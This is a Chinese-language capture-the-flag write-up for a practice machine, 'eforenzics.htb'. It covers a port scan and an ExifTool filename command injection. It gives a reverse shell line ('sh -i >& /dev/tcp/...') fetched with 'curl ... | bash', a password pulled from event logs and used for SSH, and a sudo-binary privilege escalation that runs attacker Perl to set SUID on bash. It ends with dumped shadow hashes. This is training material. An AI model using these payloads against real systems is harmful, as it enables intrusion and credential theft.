基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.197
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-23 12:58 CST
Nmap scan report for 10.10.11.197
Host is up (0.10s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 2f1e6306aa6ebbcc0d19d4152674c6d9 (RSA)
|   256 274520add2faa73a8373d97c79abf30b (ECDSA)
|_  256 4245eb916e21020617b2748bc5834fe0 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://eforenzics.htb/
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.10 seconds

80

需要加hosts:

1
10.10.11.197 eforenzics.htb

在线数字取证:

ExifTool

正常一张图片测试,发现是12.37的Exiftool,搜索发现相关漏洞:

命令注入

文件名注入,可以直接复制重命名方便操作:

1
cp miao.jpg "curl 10.10.14.9 |"

reverse shell

有字符限制,可以通过管道得到shell:

1
2
3
4
echo "sh -i >& /dev/tcp/10.10.14.9/4444 0>&1" > index.html
python -m http.server 80

cp miao.jpg "curl 10.10.14.9 | bash |"

investigation

/usr/local/investigation目录中发现一个邮件,其中有个附件里面是windows日志文件:

可以使用在线网站提取附件:

日志分析

evtx文件,可以直接使用windows分析,也可以用第三方工具,日志文件中得到密码,就是很常见的误操作场景,把密码当用户名输入了,被记录在日志中:

1
2
3
4
5
./evtx_dump-v0.8.0-x86_64-apple-darwin security.evtx -o json > events.json

cat events.json| grep TargetUserName | grep "\!"
      "TargetUserName": "Def@ultf0r3nz!csPa$$",
      "TargetUserName": "Def@ultf0r3nz!csPa$$",

user flag

用户名可以通过在www shell中知道是smorton,使用上面得到的密码登录:

1
2
ssh smorton@10.10.11.197
Def@ultf0r3nz!csPa$$

提权信息

sudo可以发现一个binary文件,尝试运行直接退出:

下载下来进行分析:

1
scp smorton@10.10.11.197:/usr/bin/binary .

binary

反编译查看代码逻辑,发现程序运行argc需要是3,所以需要两个参数,第二个参数可以看作密码,校验通过后,使用curl请求第一个参数的内容,写入到第二个参数作为文件名的文件中,然后以root权限使用perl运行这个文件:

提权 & root flag

任意perl代码:

1
2
3
4
5
# root.pl
system("chmod u+s /bin/bash");

# target
sudo /usr/bin/binary http://10.10.14.9:7777/root.pl lDnxUysaQn

shadow

1
2
root:$6$8KeEz2EYMU05RVyS$W5GGqM4AHw3D1tLul.LJN2BPUhqEdflA.yCQyu7/c2PtZmbAn6qevqSaUlFyhPQbgbhFmDB00I3Of7qPep2WP/:19233:0:99999:7:::
smorton:$6$b6pcA0sG5CxXFPzY$QW9XnZAa0B9xm0y8PkNRG497k6lae4q.7zozLTXHu3YE5ElW5Q6ithOG5kbuQOMS8leu1WceWJEJ3J6ImcKVS0:19234:0:99999:7:::

参考资料